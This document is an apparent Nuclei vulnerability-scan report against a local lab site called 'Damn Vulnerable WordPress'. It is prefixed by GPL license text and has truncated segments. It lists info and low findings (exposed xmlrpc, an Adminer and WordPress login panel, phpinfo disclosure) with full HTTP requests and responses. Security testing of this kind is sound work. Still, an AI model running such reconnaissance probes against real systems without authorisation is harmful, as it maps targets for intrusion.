b2 is (c) 2001, 2002 Michel Valdrighi - [email protected] -
http://tidakada.com
Wherever third party code has been used, credit has been given in the code's
comments.
b2 is released under the GPL
and
WordPress - Web publishing software
Copyright 2003-2010 by the contributors
WordPress is released under the GPL
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
langu.... Truncated ....
Generated by Nuclei
[wordpress-xmlrpc-file] [info] WordPress xmlrpc found on http://127.0.0.1:31337
Details: wordpress-xmlrpc-file matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/xmlrpc.php
Timestamp: Tue Jul 6 13:46:53 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | wordpress |
name | WordPress xmlrpc |
author | udit_thakkur |
severity | info |
Request
GET /xmlrpc.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 42
Allow: POST
Content-Type: text/plain;charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:53 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=3OP3mC84BxtbGceXXqxkjD6Qf3A5Sa1d; expires=Thu, 08-Jul-2021 13:46:53 GMT; Max-Age=172800; path=/
X-Powered-By: PHP/7.1.33
XML-RPC server accepts POST requests only.
Generated by Nuclei
[adminer-panel] [info] Adminer Login panel found on http://127.0.0.1:31337
Details: adminer-panel matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/adminer.php
Timestamp: Thu Jul 8 00:10:59 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Adminer Login panel |
author | random_robbie,meme-lord |
severity | info |
tags | panel |
Request
GET /adminer.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Type: text/html; charset=utf-8
Date: Thu, 08 Jul 2021 00:10:59 GMT
Referrer-Policy: origin-when-cross-origin
Server: Apache/2.4.38 (Debian)
Set-Cookie: adminer_sid=7699ca51140d7cbf4cd79fe63cf395f2; path=/adminer.php; HttpOnly
Set-Cookie: adminer_key=8e4ab9c21ebf88bf8fe7abe9b1ba6776; path=/adminer.php; HttpOnly; SameSite=lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Powered-By: PHP/7.1.33
X-Xss-Protection: 0
<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="stylesheet" type="text/css" href="adminer.php?file=default.css&version=4.6.2">
<script src='adminer.php?file=functions.js&version=4.6.2' nonce="ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk="></script>
<link rel="shortcut icon" type="image/x-icon" href="adminer.php?file=favicon.ico&version=4.6.2">
<link rel="apple-touch-icon" href="adminer.php?file=favicon.ico&version=4.6.2">
<body class="ltr nojs">
<script nonce="ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.2', 'adminer.php?', '790645:934414')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
<div id="help" class="jush-sql jsonly hidden"></div>
<script nonce="ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk=">mixin(qs('#help'), {onmouseover: function () { helpOpen = 1; }, onmouseout: helpMouseout});</script>
<div id="content">
<h2>Login</h2>
<div id='ajaxstatus' class='jsonly hidden'></div>
<form action='' method='post'>
<div></div>
<table cellspacing="0">
<tr><th>System<td><select name='auth[driver]'><option value="server" selected>MySQL<option value="sqlite">SQLite 3<option value="sqlite2">SQLite 2<option value="pgsql">PostgreSQL<option value="oracle">Oracle (beta)<option value="mssql">MS SQL (beta)<option value="firebird">Firebird (alpha)<option value="simpledb">SimpleDB<option value="mongo">MongoDB<option value="elastic">Elasticsearch (beta)</select>
<tr><th>Server<td><input name="auth[server]" value="" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
<tr><th>Username<td><input name="auth[username]" id="username" value="" autocapitalize="off">
<tr><th>Password<td><input type="password" name="auth[password]">
<tr><th>Database<td><input name="auth[db]" value="" autocapitalize="off">
</table>
<script nonce="ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk=">focus(qs('#username'));</script>
<p><input type='submit' value='Login'>
<label><input type='checkbox' name='auth[permanent]' value='1'>Permanent login</label>
</form>
</div>
<form action='' method='post'>
<div id='lang'>Language: <select name='lang'><option value="en" selected>English<option value="ar">العربية<option value="bg">Български<option value="bn">বাংলা<option value="bs">Bosanski<option value="ca">Català<option value="cs">Čeština<option value="da">Dansk<option value="de">Deutsch<option value="el">Ελληνικά<option value="es">Español<option value="et">Eesti<option value="fa">فارسی<option value="fi">Suomi<option value="fr">Français<option value="gl">Galego<option value="he">עברית<option value="hu">Magyar<option value="id">Bahasa Indonesia<option value="it">Italiano<option value="ja">日本語<option value="ko">한국어<option value="lt">Lietuvių<option value="ms">Bahasa Melayu<option value="nl">Nederlands<option value="no">Norsk<option value="pl">Polski<option value="pt">Português<option value="pt-br">Português (Brazil)<option value="ro">Limba Română<option value="ru">Русский<option value="sk">Slovenčina<option value="sl">Slovenski<option value="sr">Српски<option value="ta">தமிழ்<option value="th">ภาษาไทย<option value="tr">Türkçe<option value="uk">Українська<option value="vi">Tiếng Việt<option value="zh">简体中文<option value="zh-tw">繁體中文</select><script nonce="ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk=">qsl('select').onchange = function () { this.form.submit(); };</script> <input type='submit' value='Use' class='hidden'>
<input type='hidden' name='token' value='606961:725130'>
</div>
</form>
<div id="menu">
<h1>
<a href='https://www.adminer.org/' target="_blank" rel="noreferrer noopener" id='h1'>Adminer</a> <span class="version">4.6.2</span>
<a href="https://www.adminer.org/#download" target="_blank" rel="noreferrer noopener" id="version"></a>
</h1>
</div>
<script nonce="ZGQ5ZDhiZjk0MjFmOGZjM2VlNGNkZTQ4ODE0ZjdkMjk=">setupSubmitHighlight(document);</script>
Extra Information
Extracted results:
- 4.6.2
Reference:
Generated by Nuclei
[addeventlistener-detect] [info] AddEventlistener detection found on http://127.0.0.1:31337
Details: addeventlistener-detect matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Tue Jul 6 13:46:33 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | AddEventlistener detection |
author | yavolo |
severity | info |
tags | xss |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:32 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=DPzjPqab4zHrO94QLwf5dSaYOFSfFG5w; expires=Thu, 08-Jul-2021 13:46:33 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Reference:
Generated by Nuclei
[tech-detect:apache] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:apache matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Thu Jul 8 00:10:52 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
tags | tech |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:52 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=rg5qcGMHc4cQSA69smOqz9DfxaQBrEsB; expires=Sat, 10-Jul-2021 00:10:52 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[wordpress-panel] [info] WordPress Panel found on http://127.0.0.1:31337
Details: wordpress-panel matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/wp-login.php
Timestamp: Thu Jul 8 00:10:56 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress Panel |
author | github.com/its0x08 |
severity | info |
tags | panel |
Request
GET /wp-login.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:56 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Log In ‹ Damn Vulnerable WordPress — WordPress</title>
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='dashicons-css' href='http://127.0.0.1:31337/wp-includes/css/dashicons.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='buttons-css' href='http://127.0.0.1:31337/wp-includes/css/buttons.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='forms-css' href='http://127.0.0.1:31337/wp-admin/css/forms.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='l10n-css' href='http://127.0.0.1:31337/wp-admin/css/l10n.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='login-css' href='http://127.0.0.1:31337/wp-admin/css/login.min.css?ver=5.3' media='all' />
<meta name='robots' content='noindex,noarchive' />
<meta name='referrer' content='strict-origin-when-cross-origin' />
<meta name="viewport" content="width=device-width" />
</head>
<body class="login no-js login-action-login wp-core-ui locale-en-us">
<script type="text/javascript">
document.body.className = document.body.className.replace('no-js','js');
</script>
<div id="login">
<h1><a href="https://wordpress.org/">Powered by WordPress</a></h1>
<form name="loginform" id="loginform" action="http://127.0.0.1:31337/wp-login.php" method="post">
<p>
<label for="user_login">Username or Email Address</label>
<input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" />
</p>
<div class="user-pass-wrap">
<label for="user_pass">Password</label>
<div class="wp-pwd">
<input type="password" name="pwd" id="user_pass" class="input password-input" value="" size="20" />
<button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="Show password">
<span class="dashicons dashicons-visibility" aria-hidden="true"></span>
</button>
</div>
</div>
<p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> <label for="rememberme">Remember Me</label></p>
<p class="submit">
<input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
<input type="hidden" name="redirect_to" value="http://127.0.0.1:31337/wp-admin/" />
<input type="hidden" name="testcookie" value="1" />
</p>
</form>
<p id="nav">
<a href="http://127.0.0.1:31337/wp-login.php?action=lostpassword">Lost your password?</a>
</p>
<script type="text/javascript">
function wp_attempt_focus() {setTimeout( function() {try {d = document.getElementById( "user_login" );d.focus(); d.select();} catch( er ) {}}, 200);}
wp_attempt_focus();
if ( typeof wpOnload === 'function' ) { wpOnload() } </script>
<p id="backtoblog"><a href="http://127.0.0.1:31337/">
← Back to Damn Vulnerable WordPress </a></p>
</div>
<script src='http://127.0.0.1:31337/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script src='http://127.0.0.1:31337/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script>
var _zxcvbnSettings = {"src":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/zxcvbn.min.js"};
</script>
<script src='http://127.0.0.1:31337/wp-includes/js/zxcvbn-async.min.js?ver=1.0'></script>
<script>
var pwsL10n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};
</script>
<script src='http://127.0.0.1:31337/wp-admin/js/password-strength-meter.min.js?ver=5.3'></script>
<script src='http://127.0.0.1:31337/wp-includes/js/underscore.min.js?ver=1.8.3'></script>
<script>
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
</script>
<script src='http://127.0.0.1:31337/wp-includes/js/wp-util.min.js?ver=5.3'></script>
<script>
var userProfileL10n = {"warn":"Your new password has not been saved.","warnWeak":"Confirm use of weak password","show":"Show","hide":"Hide","cancel":"Cancel","ariaShow":"Show password","ariaHide":"Hide password"};
</script>
<script src='http://127.0.0.1:31337/wp-admin/js/user-profile.min.js?ver=5.3'></script>
<script>
/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.... Truncated ....
Generated by Nuclei
[phpinfo-files] [low] phpinfo Disclosure found on http://127.0.0.1:31337
Details: phpinfo-files matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/info.php
Timestamp: Thu Jul 8 00:11:02 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | config,exposure |
name | phpinfo Disclosure |
author | pdteam,daffainfo,meme-lord |
severity | low |
Request
GET /info.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:11:02 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
<table>
<tr class="h"><td>
